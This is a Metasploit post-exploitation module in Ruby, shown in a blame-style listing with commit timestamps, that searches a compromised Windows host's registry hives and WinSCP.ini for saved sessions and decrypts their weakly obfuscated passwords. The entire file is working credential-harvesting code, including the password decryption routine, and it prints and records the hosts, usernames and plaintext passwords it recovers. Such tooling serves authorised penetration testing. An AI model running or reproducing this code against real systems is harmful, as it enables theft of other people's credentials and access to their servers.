2011-04-26 23:55:56 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
# post/windows/gather/enum_vnc_pw.rb
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-04-26 23:55:56 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/windows/registry'
|
|
|
|
require 'rex/parser/ini'
|
2011-07-28 12:35:50 +00:00
|
|
|
require 'msf/core/post/windows/user_profiles'
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2011-06-21 00:38:04 +00:00
|
|
|
include Msf::Post::Windows::Registry
|
2011-04-26 23:55:56 +00:00
|
|
|
include Msf::Auxiliary::Report
|
2011-07-28 12:35:50 +00:00
|
|
|
include Msf::Post::Windows::UserProfiles
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
2011-10-11 21:57:20 +00:00
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Gather WinSCP Saved Password Extraction',
|
2011-10-17 01:27:28 +00:00
|
|
|
'Version' => '$Revision$',
|
2011-10-11 21:57:20 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module extracts weakly encrypted saved passwords from
|
|
|
|
WinSCP. It searches for saved sessions in the Windows Registry
|
|
|
|
and the WinSCP.ini file. It cannot decrypt passwords if a master
|
|
|
|
password is used.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],
|
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
2011-04-26 23:55:56 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_reg
|
2011-07-28 12:35:50 +00:00
|
|
|
# Enumerate all the SID in HKEY_Users and see if any of them have WinSCP RegistryKeys.
|
2011-04-26 23:55:56 +00:00
|
|
|
regexists = 0
|
2011-07-28 12:35:50 +00:00
|
|
|
|
|
|
|
userhives=load_missing_hives()
|
|
|
|
userhives.each do |hive|
|
|
|
|
next if hive['HKU'] == nil
|
|
|
|
master_key = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security"
|
|
|
|
masterpw = registry_getvaldata(master_key, 'UseMasterPassword')
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
#No WinSCP Keys here
|
|
|
|
next if masterpw.nil?
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-04-26 23:55:56 +00:00
|
|
|
regexists = 1
|
|
|
|
if masterpw == 1
|
2011-07-28 12:35:50 +00:00
|
|
|
# Master Password used to add AES256 encryption to stored password
|
2011-10-11 21:57:20 +00:00
|
|
|
print_error("User #{hive['HKU']} is using a Master Password, cannot recover passwords")
|
2011-04-26 23:55:56 +00:00
|
|
|
next
|
|
|
|
|
|
|
|
else
|
2011-07-28 12:35:50 +00:00
|
|
|
# Take a look at any saved sessions
|
2011-04-26 23:55:56 +00:00
|
|
|
savedpwds = 0
|
2011-07-28 12:35:50 +00:00
|
|
|
session_key = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions"
|
|
|
|
saved_sessions = registry_enumkeys(session_key)
|
|
|
|
next if saved_sessions.nil?
|
|
|
|
saved_sessions.each do |saved_session|
|
|
|
|
# Skip default settings entry
|
|
|
|
next if saved_session == "Default%20Settings"
|
|
|
|
|
|
|
|
active_session = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{saved_session}"
|
|
|
|
password = registry_getvaldata(active_session, 'Password')
|
|
|
|
# There is no password saved for this session, so we skip it
|
|
|
|
next if password == nil
|
2011-11-20 01:53:25 +00:00
|
|
|
|
2011-04-26 23:55:56 +00:00
|
|
|
savedpwds = 1
|
2011-07-28 12:35:50 +00:00
|
|
|
portnum = registry_getvaldata(active_session, 'PortNumber')
|
2011-04-26 23:55:56 +00:00
|
|
|
if portnum == nil
|
2011-07-28 12:35:50 +00:00
|
|
|
# If no explicit port number entry exists, it is set to default port of tcp22
|
2011-04-26 23:55:56 +00:00
|
|
|
portnum = 22
|
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-10-11 21:57:20 +00:00
|
|
|
user = registry_getvaldata(active_session, 'UserName') || ""
|
|
|
|
host = registry_getvaldata(active_session, 'HostName') || ""
|
|
|
|
proto = registry_getvaldata(active_session, 'FSProtocol') || ""
|
2011-04-26 23:55:56 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
# If no explicit protocol entry exists it is on sFTP with SCP backup. If it is 0
|
|
|
|
# it is set to SCP.
|
2011-04-26 23:55:56 +00:00
|
|
|
if proto == nil or proto == 0
|
2011-11-06 22:02:26 +00:00
|
|
|
proto = "SCP"
|
2011-10-17 03:49:49 +00:00
|
|
|
else
|
2011-04-26 23:55:56 +00:00
|
|
|
proto = "FTP"
|
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-04-26 23:55:56 +00:00
|
|
|
#Decrypt our password, and report on results
|
|
|
|
pass= decrypt_password(password, user+host)
|
|
|
|
print_status("Host: #{host} Port: #{portnum} Protocol: #{proto} Username: #{user} Password: #{pass}")
|
2012-02-01 18:26:35 +00:00
|
|
|
if session.db_record
|
|
|
|
source_id = session.db_record.id
|
|
|
|
else
|
|
|
|
source_id = nil
|
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
report_auth_info(
|
|
|
|
:host => host,
|
|
|
|
:port => portnum,
|
|
|
|
:sname => proto,
|
2012-02-01 18:26:35 +00:00
|
|
|
:source_id => source_id,
|
2011-11-08 03:34:49 +00:00
|
|
|
:source_type => "exploit",
|
2011-04-26 23:55:56 +00:00
|
|
|
:user => user,
|
|
|
|
:pass => pass
|
|
|
|
)
|
|
|
|
|
2011-11-20 01:53:25 +00:00
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
if savedpwds == 0
|
|
|
|
print_status("No Saved Passwords found in the Session Registry Keys")
|
2011-11-06 22:02:26 +00:00
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if regexists == 0
|
|
|
|
print_status("No WinSCP Registry Keys found!")
|
|
|
|
end
|
2011-07-28 12:35:50 +00:00
|
|
|
unload_our_hives(userhives)
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def get_ini(filename)
|
|
|
|
begin
|
|
|
|
#opens the WinSCP.ini file for reading and loads it into the MSF Ini Parser
|
2011-07-28 12:35:50 +00:00
|
|
|
client.fs.file.stat(filename)
|
2011-04-26 23:55:56 +00:00
|
|
|
config = client.fs.file.new(filename,'r')
|
|
|
|
parse = config.read
|
|
|
|
print_status("Found WinSCP.ini file...")
|
|
|
|
ini=Rex::Parser::Ini.from_s(parse)
|
|
|
|
|
|
|
|
#if a Master Password is in use we give up
|
|
|
|
if ini['Configuration\\Security']['MasterPassword'] == '1'
|
|
|
|
print_status("Master Password Set, unable to recover saved passwords!")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
#Runs through each group in the ini file looking for all of the Sessions
|
2011-10-17 03:49:49 +00:00
|
|
|
ini.each_key do |group|
|
2011-04-26 23:55:56 +00:00
|
|
|
groupkey='Sessions'
|
|
|
|
if group=~/#{groupkey}/
|
|
|
|
#See if we have a password saved in this sessions
|
|
|
|
if ini[group].has_key?('Password')
|
2011-07-28 12:35:50 +00:00
|
|
|
# If no explicit port number is defined, then it is the default tcp 22
|
2011-04-26 23:55:56 +00:00
|
|
|
if ini[group].has_key?('PortNumber')
|
|
|
|
portnum = ini[group]['PortNumber']
|
|
|
|
else
|
|
|
|
portnum = 22
|
|
|
|
end
|
|
|
|
host= ini[group]['HostName']
|
|
|
|
user= ini[group]['UserName']
|
|
|
|
proto = ini[group]['FSProtocol']
|
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
# If no explicit protocol entry exists it is on sFTP with SCP backup. If it
|
|
|
|
# is 0 it is set to SCP.
|
2011-04-26 23:55:56 +00:00
|
|
|
if proto == nil or proto == 0
|
2011-11-06 22:02:26 +00:00
|
|
|
proto = "SCP"
|
2011-10-17 03:49:49 +00:00
|
|
|
else
|
2011-04-26 23:55:56 +00:00
|
|
|
proto = "FTP"
|
|
|
|
end
|
2011-07-28 12:35:50 +00:00
|
|
|
# Decrypt the password and report on all of the results
|
2011-04-26 23:55:56 +00:00
|
|
|
pass= decrypt_password(ini[group]['Password'], user+host)
|
|
|
|
print_status("Host: #{host} Port: #{portnum} Protocol: #{proto} Username: #{user} Password: #{pass}")
|
2012-02-01 18:26:35 +00:00
|
|
|
if session.db_record
|
|
|
|
source_id = session.db_record.id
|
|
|
|
else
|
|
|
|
source_id = nil
|
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
report_auth_info(
|
|
|
|
:host => host,
|
|
|
|
:port => portnum,
|
|
|
|
:sname => proto,
|
2012-02-01 18:26:35 +00:00
|
|
|
:source_id => source_id,
|
2011-11-08 03:34:49 +00:00
|
|
|
:source_type => "exploit",
|
2011-04-26 23:55:56 +00:00
|
|
|
:user => user,
|
|
|
|
:pass => pass
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
end
|
2011-10-17 03:49:49 +00:00
|
|
|
rescue
|
2011-04-26 23:55:56 +00:00
|
|
|
print_status("WinSCP.ini file NOT found...")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def decrypt_next_char
|
|
|
|
|
|
|
|
pwalg_simple_magic = 0xA3
|
|
|
|
pwalg_simple_string = "0123456789ABCDEF"
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
# Decrypts the next charachter in the password sequence
|
2011-04-26 23:55:56 +00:00
|
|
|
if @password.length > 0
|
2011-07-28 12:35:50 +00:00
|
|
|
# Takes the first char from the encrypted password and finds its position in the
|
|
|
|
# pre-defined string, then left shifts the returned index by 4 bits
|
2011-04-26 23:55:56 +00:00
|
|
|
unpack1 = pwalg_simple_string.index(@password[0,1])
|
|
|
|
unpack1= unpack1 << 4
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2011-07-28 12:35:50 +00:00
|
|
|
# Takes the second char from the encrypted password and finds its position in the
|
|
|
|
# pre-defined string
|
2011-04-26 23:55:56 +00:00
|
|
|
unpack2 = pwalg_simple_string.index(@password[1,1])
|
2011-07-28 12:35:50 +00:00
|
|
|
# Adds the two results, XORs against 0xA3, NOTs it and then ands it with 0xFF
|
2011-04-26 23:55:56 +00:00
|
|
|
result= ~((unpack1+unpack2) ^ pwalg_simple_magic) & 0xff
|
2011-07-28 12:35:50 +00:00
|
|
|
# Strips the first two chars off and returns our result
|
2011-04-26 23:55:56 +00:00
|
|
|
@password = @password[2,@password.length]
|
|
|
|
return result
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def decrypt_password(pwd, key)
|
|
|
|
pwalg_simple_flag = 0xFF
|
|
|
|
@password = pwd
|
|
|
|
flag = decrypt_next_char()
|
|
|
|
|
|
|
|
if flag == pwalg_simple_flag
|
|
|
|
decrypt_next_char();
|
|
|
|
length = decrypt_next_char();
|
|
|
|
else
|
|
|
|
length = flag;
|
|
|
|
end
|
|
|
|
ldel = (decrypt_next_char())*2 ;
|
|
|
|
@password = @password[ldel,@password.length];
|
|
|
|
result="";
|
|
|
|
for ss in 0...length
|
|
|
|
result+=decrypt_next_char().chr
|
|
|
|
end
|
|
|
|
|
|
|
|
if flag == pwalg_simple_flag
|
|
|
|
result= result[key.length,result.length];
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
return result
|
|
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
print_status("Looking for WinSCP.ini file storage...")
|
|
|
|
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
|
|
|
|
print_status("Looking for Registry Storage...")
|
|
|
|
get_reg()
|
|
|
|
print_status("Done!")
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
end
|